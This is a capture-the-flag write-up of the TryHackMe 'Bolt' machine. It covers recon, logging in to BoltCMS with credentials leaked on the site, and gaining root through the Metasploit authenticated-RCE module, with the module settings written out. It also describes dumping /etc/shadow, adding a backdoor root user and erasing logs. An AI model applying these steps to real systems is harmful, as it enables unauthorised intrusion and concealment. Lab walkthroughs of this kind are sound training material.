TryHackMe: Bolt Write-up

Photo by paul mocan on Unsplash

A machine that highlights the authenticated remote code execution vulnerability in BoltCMS 3.7.0. This machine is a pretty straightforward box since exploiting the using the metasploit module gives us a root shell on the machine. Let’s hop straight into it!

IP = 10.10.143.4*
Difficulty: Easy
Machine OS: Linux
Learning Platform: tryhackme.com
Created by: 0x9747

• Note: IP address may vary.

Reconnaissance

Scoping and Preparation

Connect to Tryhackme OpenVPN Server using:

• sudo openvpn {PATH_TO_OVPN_FILE}

Run our recon tools such as nmap and gobuster.

I ran nmap twice to get the specific ports that are open so I can do OS and Version enumeration faster since I got the open ports needed.

1st Nmap command used: sudo nmap -T4 -p- -oN [FILENAME] [IP]

2nd Nmap command used: sudo nmap -A -T4 -p[OPEN_PORTS_GOT_ON_1ST_NMAP_SCAN] -oN [FILENAME] [IP]

Gobuster command used: gobuster dir -u http://[IP] -w [WORDLIST] -o [FILENAME FOR OUTPUT] -t [NUMBER OF THREADS]

External Enumeration

Preliminary Enumeration via nmap

Table 1.1: nmap Results Summary

nmap result summary.

partial nmap result summary.

Ubuntu Version: Ubuntu Bionic

Web Enumeration

Browsing through the HTTP service at port 80 gives us the default Apache page.

default page for Apache2

Let’s see what the web technologies that the web server use. In this case, I use the browser extension wapplayzer. Link

web technologies used by HTTP service at port 80.

Nothing new come up from checking the web technologies using wappalyzer. Let’s see the HTTP service in port 8000.

webpage at port 8000 that includes possible credentials.

Scrolling through the webpage (as shown in the image above), we see a post from Jake telling the password of the admin account.

Let’s see the web technologies used in the HTTP server at port 8000.

Scrolling further, we can also see that Jake also shares the username of his admin account named bolt.

username in the web server is bolt.

web technologies in port 8000.

We can see that the HTTP server at port 8000 is running BoltCMS. We will look for the documentation about BoltCMS later since we have possible credentials for the CMS.

Searching bolt cms login page on google gives us the documentation for BoltCMS.

BoltCMS documentation about the location of login page.

Using the information we got on the BoltCMS documentation, we typed the URL where the login page reside.

trying the credentials found on posts in the web server.

Submitting the credentials, we are now logged in as admin in the BoltCMS and also we can see the BoltCMS version. We can try if it has specific version vulnerability.

logged in as bolt.

Exploitation

Web Server Exploitation

We now have valid login for the webpage and BoltCMS version. We can look if the running version of BoltCMS has vulnerabilities. We can use the tool searchsploit.

Command used: searchsploit bolt

BoltCMS exploits as per searchsploit.

We can see that there is a authenticated RCE (Remote Code Execution) in BoltCMS v.3.7.0.. We can further examine it using searchsploit by using the -x flag and copying the path shown on the previous searchsploit output.

Command used: searchsploit -x php/webapps/48296.py

The command above will show the exploit code for the specified path given on searchsploit.

Basing on the tryhackme question, it suggests that we use the metasploit module for our exploit.

metasploit module for BoltCMS 3.7.0 — Authenticated Remote Code Execution.

We will use the exploit/unix/webapp/bolt_authenticated_rce module for our exploit. To quickly select this module, type use 0.

We just need to set the LHOST, RHOST, USERNAME and PASSWORD to successfully run the exploit module. The commands used are shown below. (Note: Press ENTER key for every command) Lastly type, run or if you want to be a cool kid, type exploit.

set LHOST [YOUR_THM_IP]
set RHOST [VICTIM_MACHINE_IP]
set USERNAME bolt
set PASSWORD boltadmin123
run

Table 1.2: Credentials

credentials found.

Post-Exploitation

Internal Enumeration

Table 1.3: Checklist for Linux Internal Enumeration

mini checklist for linux privilege escalation.

Notes: For more information about the commands look here

Tip: When nothing else makes sense, try to use LinPEAS (winPEAS for windows machines.).

We are now logged in as root.

using the metasploit module gives us a root shell.

We don’t have a need to escalate our privileges since we are now root.

To find the flag, use the find binary:

Command used: find / -type f -name 'flag.* 2>/dev/null'

finding the flag using find binary.

Data Exfiltration

We also managed to get the confidential info for the machine and dumped it into a file named Confidential.md (includes /etc/shadow contents and root flag).

STATUS: ROOTED

The next two steps are not necessary for completion of the machine but it completes the 5 Phases of Penetration Testing.

Persistence

Copied the /etc/shadow file for user identification and their passwords.

Added another root user for easy access.

Clearing Tracks

Removed all logs and footprints to to prevent risk of exposure of breach to security administrator.

Status: Finished

Feel free to reach out and if there is something wrong about the above post. Feedback are also appreciated! :D

Donation Box

Not required but appreciated! :D

Socials

• Twitter
• Medium